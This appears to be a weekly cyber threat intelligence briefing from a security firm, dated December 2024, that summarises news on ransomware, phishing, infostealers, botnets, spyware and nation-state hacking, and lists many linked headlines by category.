New Warning As Self-Deleting Cyber Attack Targets Windows, Mac

Top 10 Cyber Law Enforcement Operations of 2024 - Infosecurity Magazine

Beware Feb. 3, 2025—Diabolic Ransomware Gang Issues New Attack Warning

Interlock ransomware attacks highlight need for greater security standards on critical infrastructure | TechRadar

Suspected LockBit dev faces extradition to the US • The Register

How companies can fight ransomware impersonations - Help Net Security

Nearly four decades on and, like Jesus, ransomware won't die • The Register

6 Crafty Tactics Cyber Criminals Use To Snag Money From Home Users Fast

Facing the Specter of Cyber Threats During the Holidays

Brazilian Hacker Charged for Extorting $3.2M in Bitcoin After Breaching 300,000 Accounts

Ransomware Victims

Clop ransomware is now extorting 66 Cleo data-theft victims

5.6M people exposed in Ascension Health ransomware incident earlier this year | Cybernews

Hackney Council: Cyber Attack Cost 'hundreds of thousands' - BBC News

Krispy Kreme breach, data theft claimed by Play ransomware gang

Ransomware Group Claims Theft of Personal, Financial Data From Krispy Kreme - SecurityWeek

Phishing & Email Based Attacks

Phishing Report Findings Call For A Fundamental Shift In Organisational Approaches To Defence

This devious two-step phishing campaign uses Microsoft tools to bypass email security | TechRadar

Hackers are using Russian domains to launch complex document-based phishing attacks | TechRadar

Fake DocuSign docs used to secure corporate credentials in mishing campaign | SC Media

Rockstar2FA Collapse Fuels Expansion of FlowerStorm Phishing-as-a-Service

A new Microsoft 365 phishing service has emerged, so be on your guard | TechRadar

Urgent New Gmail Security Warning For Billions As Attacks Continue

Defence Giant General Dynamics Says Employees Targeted in Phishing Attack - SecurityWeek

Other Social Engineering

You Need to Create a Secret Password With Your Family | WIRED

Lazarus APT targeted employees at an unnamed nuclear-related organisation

North Korean “Laptop Farm” IT Worker Scam Targets Multiple High-Profile Companies | Ankura - JDSupra

Artificial Intelligence

AI-driven scams are about to get a lot more convincing - Help Net Security

AI Could Generate 10,000 Malware Variants, Evading Detection in 88% of Case

Beware Of Shadow AI – Shadow IT's Less Well-Known Brother - SecurityWeek

AI impersonators will wreak havoc in 2025. Here’s what to look for | PCWorld

Italy’s Data Protection Watchdog Issues €15m Fine to OpenAI Over ChatG - Infosecurity Magazine

You Need to Create a Secret Password With Your Family | WIRED

Urgent New Gmail Security Warning For Billions As Attacks Continue

Businesses Need New AI Governance in Cyber Security and Privacy

Will AI Drive Efficiency and Budget Growth? Risks, Rewards & Reality - Security Boulevard

Open source machine learning systems are highly vulnerable to security threats | TechRadar

The Intersection of AI and OSINT: Advanced Threats On The Horizon - SecurityWeek

2FA/MFA

Evilginx: Open-source man-in-the-middle attack framework - Help Net Security

Home for the holidays? Share this top cyber security advice with friends and family | TechCrunch

Malware

Infostealers Dominate as Lumma Stealer Detections Soar by Almost 400% - Infosecurity Magazine

AI Could Generate 10,000 Malware Variants, Evading Detection in 88% of Case

New Warning As Self-Deleting Cyber Attack Targets Windows, Mac

Cryptomining Malware Found in Popular Open Source Packages - Infosecurity Magazine

Researchers Uncover PyPI Packages Stealing Keystrokes and Hijacking Social Accounts

New 'OtterCookie' malware used to backdoor devs in fake job offers

Iran's Charming Kitten Deploys BellaCPP: A New C++ Variant of BellaCiao Malware

Bots/Botnets

Webcams and DVRs Vulnerable to HiatusRAT, FBI Warns - Infosecurity Magazine

BadBox rapidly grows, 190,000 Android devices infected - Security Affairs

New Androxgh0st botnet targets vulnerabilities in IoT devices and web applications via Mozi integration | TechRadar

How Not To Become A Botnet Victim: A Practical Guide For Everyone

New botnet exploits vulnerabilities in NVRs, TP-Link routers

How Androxgh0st, the hybrid botnet, rose from Mozi's ashes • The Register

Botnets leverage decade-old D-Link vulnerabilities in new attack campaigns - SiliconANGLE

A new Mirai botnet variant targets DigiEver DS-2105 Pro DVRs

Mobile

Apple warns spyware targets via ‘threat notifications,’ offers these next steps - 9to5Mac

CISA: Use Signal or other secure communications app - Help Net Security

Fake DocuSign docs used to secure corporate credentials in mishing campaign | SC Media

ICO Warns of Festive Mobile Phone Privacy Snafu - Infosecurity Magazine

iOS devices more exposed to phishing than Android - Help Net Security

FBI Says Use Secret Word, NSA Says Reboot iPhone—Should You Listen?

Spyware Maker NSO Group Found Liable In US Court | Silicon UK

Denial of Service/DoS/DDoS

DNSSEC Denial-of-Service Attacks Show Technology's Fragility

Top 10 Cyber Law Enforcement Operations of 2024 - Infosecurity Magazine

DDoS Attacks Surge as Africa Expands Its Digital Footprint

Palo Alto Releases Patch for PAN-OS DoS Flaw — Update Immediately

7 Ways to Stop VoIP DDoS Attacks from Crashing Your Phones

Internet of Things – IoT

Webcams and DVRs Vulnerable to HiatusRAT, FBI Warns - Infosecurity Magazine

BadBox rapidly grows, 190,000 Android devices infected - Security Affairs

New Androxgh0st botnet targets vulnerabilities in IoT devices and web applications via Mozi integration | TechRadar

New botnet exploits vulnerabilities in NVRs, TP-Link routers

How Androxgh0st, the hybrid botnet, rose from Mozi's ashes • The Register

A new Mirai botnet variant targets DigiEver DS-2105 Pro DVRs

6 Easy Ways To Make Your Smart Home More Secure

Data Breaches/Leaks

Infostealers Dominate as Lumma Stealer Detections Soar by Almost 400% - Infosecurity Magazine

Small Business Cyber Security Statistics

Half of UK businesses hit by cyber breaches in 2024 - Digital Journal

Clop ransomware threatens 66 Cleo attack victims with data leak

These were the badly handled data breaches of 2024 | TechCrunch

5.6M people exposed in Ascension Health ransomware incident earlier this year | Cybernews

Ascension: Health data of 5.6 million stolen in ransomware attack

FTC orders Marriott and Starwood to implement strict data security

Peugeot Data Breach: Hackers Threaten to Release Stolen Client Information

Nearly half a million people had data stolen after cyber attack on American Addiction Centers | The Record from Recorded Future News

What Should You Do When You Receive a Data Breach Notice? - CNET

Organised Crime & Criminal Actors

Major Biometric Data Farming Operation Uncovered - Infosecurity Magazine

New Study Reveals Widening Gap Between Cyber Attack Causes and Public Perception

Message service predominantly used by Pixel users intercepted by authorities - PhoneArena

Suspected LockBit dev faces extradition to the US • The Register

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

792 Syndicate Suspects Arrested in Massive Crypto and Romance Scam: The Rise of Cyber Crime as a Corporate Enterprise - IT Security Guru

North Korea hackers behind 60% of all crypto stolen in 2024

North Koreans Stole $1.34bn In Crypto This Year | Silicon UK Tech

NFT scammers charged for stealing $22 million through "rug pulls" - Help Net Security

US and Japan Blame North Korea for $308m Crypto Heist - Infosecurity Magazine

Cryptomining Malware Found in Popular Open Source Packages - Infosecurity Magazine

South Korea sanctions 15 North Koreans for crypto heists and cyber theft

Crypto scam suspect arrested in bed as cyber crime cops raid home - Manchester Evening News

Brazilian Hacker Charged for Extorting $3.2M in Bitcoin After Breaching 300,000 Accounts

Insurance

Cyber Risks and Insurance 2025 Forecast | Wiley Rein LLP - JDSupra

Cloud/SaaS

Rockstar2FA Collapse Fuels Expansion of FlowerStorm Phishing-as-a-Service

A new Microsoft 365 phishing service has emerged, so be on your guard | TechRadar

Amazon Security Warning As 3 High-Rated Vulnerabilities Hit Cloud

Why Cloud Identity Attacks Outpace On-Premises Risks

Outages

Service disruptions continue to blindside businesses - Help Net Security

Identity and Access Management

Non-Human Identities Gain Momentum, Requires Both Management, Security

Why Cloud Identity Attacks Outpace On-Premises Risks

Encryption

Why cryptography is important and how it’s continually evolving - Security Boulevard

Linux and Open Source

What open source means for cyber security - Help Net Security

Cryptomining Malware Found in Popular Open Source Packages - Infosecurity Magazine

Strengthening open source: A roadmap to enhanced cyber security - Nextgov/FCW

The Linux log files you should know and how to use them | ZDNET

Open source machine learning systems are highly vulnerable to security threats | TechRadar

Passwords, Credential Stuffing & Brute Force Attacks

Home for the holidays? Share this top cyber security advice with friends and family | TechCrunch

Social Media

Drug Dealers Have Moved on to Social Media | WIRED

Researchers Uncover PyPI Packages Stealing Keystrokes and Hijacking Social Accounts

Regulations, Fines and Legislation

Meet the In-Laws: the UK’s Digital Legislative Agenda for 2025 | Ropes & Gray LLP - JDSupra

EU DORA: Are you in scope, and if so, how can you prepare? | King & Spalding - JDSupra

The Cyber Resilience Act: A Field Guide for CTOs and CISOs | HackerNoon

A Hit-and-Miss First Year for SEC’s Cyber Incident Reporting Rules | MSSP Alert

Trump 2.0 Portends Big Shift in Cyber Security Policies

Guardians Of Peace: The EU’s Role In Global Security – OpEd – Eurasia Review

Europe's move toward cyber security sovereignty [Q&A]

INTERPOL welcomes adoption of UN convention against cyber crime

FTC orders Marriott and Starwood to implement strict data security

Italy’s Data Protection Watchdog Issues €15m Fine to OpenAI Over ChatGPT - Infosecurity Magazine

Cyber experts applaud White House cyber security plan

FCC ‘rip and replace’ provision for Chinese tech tops cyber provisions in defence bill | The Record from Recorded Future News

Models, Frameworks and Standards

EU DORA: Are you in scope, and if so, how can you prepare? | King & Spalding - JDSupra

The Cyber Resilience Act: A Field Guide for CTOs and CISOs | HackerNoon

Data Protection

5 Questions to Ask to Ensure Data Resiliency

Law Enforcement Action and Take Downs

792 Syndicate Suspects Arrested in Massive Crypto and Romance Scam: The Rise of Cyber Crime as a Corporate Enterprise - IT Security Guru

BadBox rapidly grows, 190,000 Android devices infected - Security Affairs

LockBit Developer Rostislav Panev Charged for Billions in Global Ransomware Damages

NFT scammers charged for stealing $22 million through "rug pulls" - Help Net Security

LockBit Taunts New Version as Original Developer Charged | SC Media UK

Interpol Identifies Over 140 Human Traffickers in New Initiative - Infosecurity Magazine

Top 10 Cyber Law Enforcement Operations of 2024 - Infosecurity Magazine

Massive live sports piracy ring with 812 million yearly visits taken offline

Message service predominantly used by Pixel users intercepted by authorities - PhoneArena

Crypto scam suspect arrested in bed as cyber crime cops raid home - Manchester Evening News

Brazilian Hacker Charged for Extorting $3.2M in Bitcoin After Breaching 300,000 Accounts


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

The 2024 cyberwar playbook: Tricks used by nation-state actors | CSO Online

Middle East Cyberwar Rages On, With No End in Sight

Nation State Actors

How Nation-State Cyber Criminals Are Targeting the Enterprise

China

CISA: Use Signal or other secure communications app - Help Net Security

Underwater footage raises suspicions of undersea cable sabotage as European authorities board Chinese ship for investigation | Tom's Hardware

DHS Says China, Russia, Iran, and Israel Are Spying on People in US with SS7

Hundreds of organisations were notified of potential Salt Typhoon compromise - Nextgov/FCW

Major cyber security attack from China exposes systematic flaws - TheStreet

Feds lay blame while Chinese telecom attack continues | CyberScoop

FCC ‘rip and replace’ provision for Chinese tech tops cyber provisions in defence bill | The Record from Recorded Future News

Russia

Russia fires its biggest cyber weapon against Ukraine | CSO Online

Ukraine blames Russia for mega cyber attack on ‘critically important’ infrastructure – POLITICO

Hackers are using Russian domains to launch complex document-based phishing attacks | TechRadar

Underwater footage raises suspicions of undersea cable sabotage as European authorities board Chinese ship for investigation | Tom's Hardware

Russians deleted one of Ukraine's most restricted registers in recent cyber attack, Ukrainian official says | Ukrainska Pravda

International Cyber Defence Coalition Reports Significant Progress in Protecting Ukrainian Digital Infrastructure | HaystackID - JDSupra

DHS Says China, Russia, Iran, and Israel Are Spying on People in US with SS7

Russian cyber attack: Breach occurred at 'top-level account,' MP says

Iran

DHS Says China, Russia, Iran, and Israel Are Spying on People in US with SS7

OilRig Hackers Exploiting Windows Kernel 0-day to Attack Organisations

Iran's Charming Kitten Deploys BellaCPP: A New C++ Variant of BellaCiao Malware

North Korea

North Korea hackers behind 60% of all crypto stolen in 2024

North Koreans Stole $1.34bn In Crypto This Year | Silicon UK Tech

US and Japan Blame North Korea for $308m Crypto Heist - Infosecurity Magazine

Lazarus APT targeted employees at an unnamed nuclear-related organisation

North Korean “Laptop Farm” IT Worker Scam Targets Multiple High-Profile Companies | Ankura - JDSupra

New 'OtterCookie' malware used to backdoor devs in fake job offers

South Korea sanctions 15 North Koreans for crypto heists and cyber theft

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Middle East Cyberwar Rages On, With No End in Sight

Europe is the top target for hacktivists, Orange Cyberdefence report reveals | Total Telecom

Apple warns spyware targets via ‘threat notifications,’ offers these next steps - 9to5Mac

Pegasus spyware maker NSO Group is liable for attacks on 1,400 WhatsApp users - The Verge

'Expulsion to Spain': Israeli Hackers Flock to Barcelona in Big Spyware Shift - National Security & Cyber - Haaretz.com





Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.


Black Arrow Cyber Threat Intelligence Briefing 20 December 2024

Black Arrow Cyber Threat Intelligence Briefing 20 December 2024:

-Mobile Spear Phishing Targets Executive Teams

-From Digital Risk to Physical Threat: Why Cyber Security Must Evolve for Executives

-Why HNWIs are Seeking Personal Cyber Security Consultants

-Ransomware in 2024: New Players, Bigger Payouts, and Smarter Tactics

-Credential Phishing Attacks Up Over 700 Percent

-All Major European Financial Firms Suffer Supplier Breaches

-Phishers Cast Wide Net with Spoofed Google Calendar Invites

-Security Leaders Say Machine Identities Are Next Big Target for Cyber Attack

-Ransomware Defences are Weakened by Backup Technology

-Cyber Security is Never Out-of-Office: Protecting Your Business Anytime, Anywhere

-Ransomware, Deepfakes, and Scams: The Digital Landscape in 2024

-UK Companies Face Increasing Cyber Security Risks Across a Range of Threats

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Mobile Spear Phishing Targets Executive Teams

Over the past few months, sophisticated spear phishing campaigns have intensified, targeting corporate executives via mobile devices and trusted business platforms. These attacks leverage advanced redirection techniques, PDF-based phishing links and compromised domains to bypass traditional defences. Mobile devices represent a distinct and often unsecured attack surface, enabling threat actors to harvest high-value corporate credentials with alarming efficiency. To protect against these evolving threats, organisations require education and awareness as well as advanced, on-device detection and prevention measures. Recent research has shown that zero-day protection and adaptive, mobile-specific security solutions are now critical to safeguarding sensitive enterprise data.

From Digital Risk to Physical Threat: Why Cyber Security Must Evolve for Executives

Protecting executives goes beyond digital measures, as these leaders’ personal safety and actions directly affect company valuation, investor confidence, and regulatory scrutiny. The US Securities and Exchange Commission (SEC)’s emphasis on governance and risk transparency underscores the importance of securing executives against both cyber and physical threats. Proactive approaches - blending digital and physical security, continuous monitoring of key terms, and behavioural science insights - are vital. By identifying threats early, understanding their social context, and ensuring senior leaders appreciate these vulnerabilities, organisations can strengthen resilience, reassure stakeholders, and meet regulatory expectations in an evolving threat landscape.

Why HNWIs are Seeking Personal Cyber Security Consultants

High net worth individuals (HNWIs) are facing increasingly complex and evolving cyber threats, from phishing and ransomware to social engineering. Their wealth, influence and public profile make them prime targets, exposing them to severe financial, reputational and personal risks. HNWIs need to ensure they have conducted tailored risk assessments, and to put in place appropriate security controls, constant monitoring, and privacy management for themselves and their families. With global cyber crime costs projected to reach $10.5 trillion annually by 2025, these actions help safeguard digital assets, protect reputations, and ensure peace of mind in an ever more volatile online environment.

Ransomware in 2024: New Players, Bigger Payouts, and Smarter Tactics

Ransomware remains the leading global cyber security threat in 2024, with new groups rising after criminal takedowns. Demands soared, including a record-breaking $75 million ransom. Attacks span multiple sectors, with the construction industry hit hardest, and often occur overnight or at weekends. Over three-quarters paid ransoms, with average demands exceeding $1.5 million, and recovery costs surpassing $2.7 million. Smaller enterprises are especially vulnerable.

Credential Phishing Attacks Up Over 700 Percent

Phishing remains a top concern for organisations worldwide, with a new report showing credential-based attacks increasing by 703% in late 2024. Overall email threats rose by 202%, exposing employees to up to six threats per week and as many as 600 mobile threats annually. 80% of malicious links were previously unknown, underscoring limitations in static defences. Social engineering-based attacks surged by 141%, forcing leaders to reconsider their approach. Experts anticipate continued escalation in 2025, stressing the need for comprehensive and proactive security strategies backed by real-time detection and adaptable mitigation measures to outpace increasingly agile attackers.

All Major European Financial Firms Suffer Supplier Breaches

New research found that all major European financial firms experienced supplier-related breaches last year. Only a quarter achieved top-tier cyber security resilience ratings, while nearly all suffered from third- and fourth-party breaches. Around a fifth also endured a direct breach. Some 33% of financial services companies received a lower rating, with pending EU regulations like DORA adding urgency. Scandinavian firms outperformed peers, whereas French organisations reported the highest rate of supply chain breaches. Improving domain name system (DNS) configurations, endpoint security and patching cycles were recommended to strengthen defences.

Phishers Cast Wide Net with Spoofed Google Calendar Invites

A recent phishing campaign has spoofed Google Calendar invites, reaching about 300 organisations with more than 4,000 malicious emails over four weeks. Fraudsters trick users into clicking bogus links that eventually lead to fake sites designed to steal personal and financial details. Such attacks are lucrative: last year, victims in one country lost nearly $19 million to phishing scams. Security experts advise verifying links before clicking, and using two-factor authentication. As criminals easily adapt their methods, staying vigilant and questioning unusual requests remain vital for safeguarding against these persistent social engineering threats.

Security Leaders Say Machine Identities Are Next Big Target for Cyber Attack

New research shows many organisations faced cloud related security incidents last year, causing delays for over half, service outages for almost half, and data breaches for nearly a third. Security leaders warn that machine identities, especially access tokens and service accounts, are the next major target. They also predict more sophisticated supply chain attacks involving AI. Conflicts persist between security and development teams, and complexity grows as machine identities proliferate. Experts say securing these identities, along with automated protection and comprehensive controls, is now essential to safeguard cloud environments and ensure stable, secure business operations.

Ransomware Defences are Weakened by Backup Technology

Recent research by Object First shows ransomware attacks increasingly target backup data and exploit vulnerabilities. Research participants said their outdated systems (34%), limited encryption (31%) and failed backups (28%) weaken defences. Immutable storage is seen as vital, with 93% agreeing it is essential and 97% planning to invest. Zero Trust principles are widely supported, but managing these technologies poses challenges. Nearly 41% lack the necessary skills and 69% cannot afford extra expertise. The findings underscore the urgency for resilient, ransomware-proof backup systems and highlight the need for robust cyber security measures to mitigate these evolving threats.

Cyber Security is Never Out-of-Office: Protecting Your Business Anytime, Anywhere

With many staff away during the festive season, cyber criminals see an ideal opportunity to strike. Ransomware attacks surge by around 30% on public holidays and weekends, with 89% of security professionals worried about off-hours threats. As payment rates have fallen from around 80% to 36% over five years, attackers now exploit vulnerable times such as night shifts to make their attacks more effective. Organisations must ensure year-round vigilance, including strong authentication, continuous patching, and clear incident response plans. Proper training, supply chain security, data encryption and processes to verify money transfers are essential. In short, robust cyber security plans cannot afford an “out of office.”

Ransomware, Deepfakes, and Scams: The Digital Landscape in 2024

ESET’s 2024 threat report highlights a surge in investment and crypto scams, often using deepfakes and celebrity images to enhance credibility. New ransomware operators have emerged to fill the void left by ransomware gangs such as Lockbit, with RansomHub alone claiming nearly 500 victims, including major companies. Infostealer activity has shifted as infostealers RedLine and Meta were taken down, boosting their competitor Lumma’s popularity by 368%. Malware trends are mixed, with the detection of Agent Tesla malware down by 26% but Formbook malware showing a dramatic spike of up to 7,000 daily detections. Despite some law enforcement successes, the cyber security landscape remains unpredictable and continuously evolving.

UK Companies Face Increasing Cyber Security Risks Across a Range of Threats

New findings from Horizon3.ai’s "Cyber Security Report UK 2024/2025" show a growing risk environment across various industries, with nearly half of UK organisations (48%) citing stolen user credentials as a top cyber security threat. Insufficiently secured or unknown data stores were noted by 42%, and almost a third (29%) flagged attacks exploiting known but unpatched software vulnerabilities. In the survey of 150 executives and IT professionals, 69% reported at least one cyber attack in the past two years, yet 66% lack adequate defences. Experts advise continuous penetration testing and more proactive, attacker-focused security measures to strengthen resilience, given the escalation in attack complexity and severity.

Sources:

https://securityboulevard.com/2024/12/mobile-spear-phishing-targets-executive-teams/

https://www.scworld.com/perspective/from-digital-risk-to-physical-threat-why-cybersecurity-must-evolve-for-executives

https://securityboulevard.com/2024/12/why-hnwis-are-seeking-personal-cybersecurity-consultants/

https://www.helpnetsecurity.com/2024/12/19/ransomware-surveys-2024/

https://betanews.com/2024/12/18/credential-phishing-attacks-up-over-700-percent/

https://www.infosecurity-magazine.com/news/all-europes-top-financial-firms/

https://www.theregister.com/2024/12/18/google_calendar_spoofed_in_phishing_campaign/

https://www.businesswire.com/news/home/20241216555147/en/Security-Leaders-Say-Machine-Identities-%E2%80%93-Such-as-Access-Tokens-and-Service-Accounts-%E2%80%93-Are-Next-Big-Target-for-Cyberattack

https://www.techradar.com/pro/Ransomware-defenses-are-being-weakened-by-outdated-backup-technology-limited-backup-data-encryption-and-failed-data-backups

https://www.welivesecurity.com/en/business-security/cybersecurity-never-out-of-office-protecting-business-anytime-anywhere/

https://www.techradar.com/pro/security/ransomware-deepfakes-and-scams-the-digital-landscape-in-2024

https://pressat.co.uk/releases/uk-companies-face-increasing-cyber-security-risks-across-a-range-of-threats-new-report-reveals-eb07fa15c46681cbda6c239a57c3f447/
Governance, Risk and Compliance

Why HNWIs are Seeking Personal Cyber Security Consultants - Security Boulevard

UK Companies Face Increasing Cyber Security Risks Across a Range of Threats, New Report Reveals | Pressat

From digital risk to physical threat: Why cyber security must evolve for executives | SC Media

Innovation, insight and influence: the CISO playbook for 2025 and beyond | Computer Weekly

77% of IT leaders cite cyber security as top challenge in global survey

ISC2 Survey Reveals Critical Gaps in Cyber Security Leadership Skills - Infosecurity Magazine

How to turn around a toxic cyber security culture | CSO Online

The evolution of incident response: building a successful strategy | TechRadar

The Importance of Empowering CFOs Against Cyber Threats

How the cyber security landscape affects the financial sector

Threat of personal liability has CISOs sweating | ITPro

70% of cyber security leaders influenced by personal liability concerns | Security Magazine

CISO accountability: Navigating a landscape of responsibility - Help Net Security

How weaponized AI drives CISO burnout – and what to do about it | SC Media

CISO Challenges for 2025: Overcoming Cyber Security Complexities - Security Boulevard

MSSP Market Update: Fortune 500 Firms Fail at Cyber Security | MSSP Alert

2025 is set to bring changes in technology adoption and the evolving attack surface

Cyber security In 2025 – A New Era Of Complexity

To Defeat Cyber Criminals, Understand How They Think

Making smart cyber security spending decisions in 2025
Threats

Ransomware, Extortion and Destructive Attacks

Ransomware threat shows no sign of slowing down | Microscope

Ransomware defences are being weakened by outdated backup technology, limited backup data encryption, and failed data backups | TechRadar

Clop is back to wreak havoc via vulnerable file-transfer software | CyberScoop

The year in ransomware: Security lessons to help you stay one step ahead - Security Boulevard

Ransomware in 2024: New players, bigger payouts, and smarter tactics - Help Net Security

‘Tis the Season to Be Alert for Cyber Threats: 5 Unjoyful… | Intel 471

Cyber security is never out-of-office: Protecting your business anytime, anywhere

46% of financial institutions had a data breach in the past 24 months - Help Net Security

Akira and RansomHub Surge as Ransomware Claims Reach All-Time High - Infosecurity Magazine

Clop ransomware claims responsibility for Cleo data theft attacks

Ransomware, deepfakes, and scams: the digital landscape in 2024 | TechRadar

RansomHub emerges as dominant ransomware group as 2024 ends | SC Media

LockBit ransomware gang teases February 2025 return | Computer Weekly

How Cyber Attacks Hold Patient Care Hostage | MedPage Today

Ransomware Gang Says Deloitte Sucks at Their Job - Going Concern

How Do We Build Ransomware Resilience Beyond Just Backups?

Romanian Netwalker ransomware affiliate sentenced to 20 years in prison

How to mitigate wiper malware | TechTarget

Ransomware Victims

46% of financial institutions had a data breach in the past 24 months - Help Net Security

Clop ransomware claims responsibility for Cleo data theft attacks

How the ransomware attack at Change Healthcare went down: A timeline | TechCrunch

The Bookseller - News - Waterstones hit by Blue Yonder ransomware gang attack

Ransomware Gang Says Deloitte Sucks at Their Job - Going Concern

Rhode Island confirms data breach after Brain Cipher ransomware attack

Major Auto Parts Firm LKQ Hit by Cyber Attack - SecurityWeek

Phishing & Email Based Attacks

How Companies Lose Millions Of Dollars To Phishing

Cofense report warns of credential-harvesting attacks that spoof Proofpoint, Mimecast and Virtru - SiliconANGLE

Credential phishing attacks up over 700 percent

Midnight Blizzard Taps Phishing Emails, Rogue RDP Nets

Phishing Attacks Double in 2024 - Infosecurity Magazine

Credential phishing attacks rose by 703% in H2 of 2024 | Security Magazine

Mobile Spear Phishing Targets Executive Teams - Security Boulevard

MUT-1244 targeting security researchers, red teamers, and threat actors - Help Net Security

Organisations Warned of Rise in Okta Support Phishing Attacks - SecurityWeek

Google Calendar invites spoofed in phishing campaign • The Register

Crooks use Docusign lures to attempt Azure account takeovers • The Register

Credential phishing attacks surge, report reveals | SC Media

Executives targeted in mobile spearphishing attacks | Security Magazine

YouTube Channels Targeted With Windows Malware Phishing Attacks

Inside the latest phishing campaigns: dissecting CarPhish, EDG, Tpass, and Mamba2FA kits - VMRay

HubPhish Exploits HubSpot Tools to Target 20,000 European Users for Credential Theft

HubSpot phishing targets 20,000 Microsoft Azure accounts

European firms subjected to HubSpot-exploiting phishing | SC Media

New fake Ledger data breach emails try to steal crypto wallets

New Gmail Security Warning For 2.5 Billion—Second Attack Wave Incoming

Other Social Engineering

FTC warns of online task job scams hooking victims like gambling

New Investment Scam Leverages AI, Social Media Ads to Target Victims Worldwide

Cyber Criminals Exploit Google Calendar to Spread Malicious Links - Infosecurity Magazine

Microsoft Teams Vishing Spreads DarkGate RAT

Mobile Spear Phishing Targets Executive Teams - Security Boulevard

MUT-1244 targeting security researchers, red teamers, and threat actors - Help Net Security

DarkGate malware spread via Microsoft Teams, AnyDesk | SC Media

Hackers Exploit Microsoft Teams to Gain Remote Access to User’s System

‘Tis the Season to Be Alert for Cyber Threats: 5 Unjoyful… | Intel 471

Cyber security is never out-of-office: Protecting your business anytime, anywhere

Interpol: Stop calling it 'pig butchering' • The Register

Now Scammers Are Abusing Legitimate Services to Show You Fake CAPTCHAs

Watch Out for These Holiday Cyber Attacks

Artificial Intelligence

The threat of AI-driven cyber warfare is real and it can disrupt the world

Ransomware, deepfakes, and scams: the digital landscape in 2024 | TechRadar

New Investment Scam Leverages AI, Social Media Ads to Target Victims Worldwide

Bosses struggle to police workers’ use of AI

How weaponized AI drives CISO burnout – and what to do about it | SC Media

With 'TPUXtract,' Attackers Can Steal Orgs' AI Models

Identity fraud attacks using AI are fooling biometric security systems | TechRadar

Cyberint's 2024 Report Highlights Surge in Credential Theft and Rise of AI-Powered Phishing - IT Security Guru

Cloud Threat Landscape Report: AI-generated attacks low for the cloud

2024 Cyber Review: Trump Re-Election Eclipses AI and Ransomware Stories

AI is becoming the weapon of choice for cyber criminals - Help Net Security

Cyber leaders are bullish on generative AI despite risks: report | CIO Dive

The Year of Global AI and Cyber Security Regulations: 7 GRC Predictions for 2025 - Security Boulevard

Malvertisers Fool Google With AI-Generated Decoys

Malware

How infostealers are used in targeted cyber attacks

Microsoft Teams Vishing Spreads DarkGate RAT

DarkGate malware spread via Microsoft Teams, AnyDesk | SC Media

Hackers Exploit Microsoft Teams to Gain Remote Access to User’s System

Winnti hackers target other threat actors with new Glutton PHP backdoor

PHP backdoor looks to be work of Chinese-linked APT group | CyberScoop

Google, Amnesty International uncover new surveillance malware | SC Media

FBI spots HiatusRAT malware attacks targeting web cameras, DVRs

Hackers Exploit Webview2 to Deploy CoinLurker Malware and Evade Security Detection

Malvertising on steroids serves Lumma infostealer - Help Net Security

That cheap webcam? HiatusRAT may be targeting it, FBI warns | CSO Online

Raccoon Stealer malware operator gets 5 years in prison after guilty plea

YouTube Creators Targeted in Major Phishing Campaign - Infosecurity Magazine

How to mitigate wiper malware | TechTarget

Evasive Node.js loader masquerading as game hack - Help Net Security

The Mask APT Resurfaces with Sophisticated Multi-Platform Malware Arsenal

FBI Warns of HiatusRAT Attacks on Cameras, DVR Systems - SecurityWeek

A new antivirus model to fight against evasive malware - Diari digital de la URV

Critical flaw in WordPress plugin exploited to install malicious software | SC Media

Bitter APT Targets Turkish Defence Sector with WmRAT and MiyaRAT Malware

Thai Police Systems Under Fire From 'Yokai' Backdoor

Lazarus targets nuclear-related organisation with new malware | Securelist

Malicious Microsoft VSCode extensions target devs, crypto community

Bots/Botnets

Mirai botnet targets SSR devices, Juniper Networks warns

Juniper Warns of Mirai Botnet Targeting Session Smart Routers - SecurityWeek

Mobile

Mobile Spear Phishing Targets Executive Teams - Security Boulevard

Addressing BYOD Vulnerabilities in the Workplace - Security Boulevard

This Nasty Android Malware Is Picking Up Pace and Targeting Certain Devices

Executives targeted in mobile spearphishing attacks | Security Magazine

BadBox malware botnet infects 192,000 Android devices despite disruption

Serbian police used Cellebrite to unlock, then plant spyware, on a journalist's phone | TechCrunch

Authorities abroad use phone-cracking tools to install spyware, report says - The Washington Post

New Android NoviSpy spyware linked to Qualcomm zero-day bugs

Why you should not give your phone charger to others? Hackers can steal data. Tips to stay safe - The Economic Times

Hackers are using the Amazon Appstore to spread malware — delete this malicious app now | Tom's Guide

Internet of Things – IoT

Chinese wi-fi tech used in British homes investigated over hacking fears

Concerns over consumer surveillance in some smart devices | News UK Video News | Sky News

Multiple flaws in Volkswagen Group's infotainment unit allow for vehicle compromise

FBI spots HiatusRAT malware attacks targeting web cameras, DVRs

That cheap webcam? HiatusRAT may be targeting it, FBI warns | CSO Online

Zero Day Initiative — Detailing the Attack Surfaces of the Tesla Wall Connector EV Charger

Mirai botnet targets SSR devices, Juniper Networks warns

Juniper Warns of Mirai Botnet Targeting Session Smart Routers - SecurityWeek

FBI Warns of HiatusRAT Attacks on Cameras, DVR Systems - SecurityWeek

Germany blocks BadBox malware loaded on 30,000 Android devices

Data Breaches/Leaks

46% of financial institutions had a data breach in the past 24 months - Help Net Security

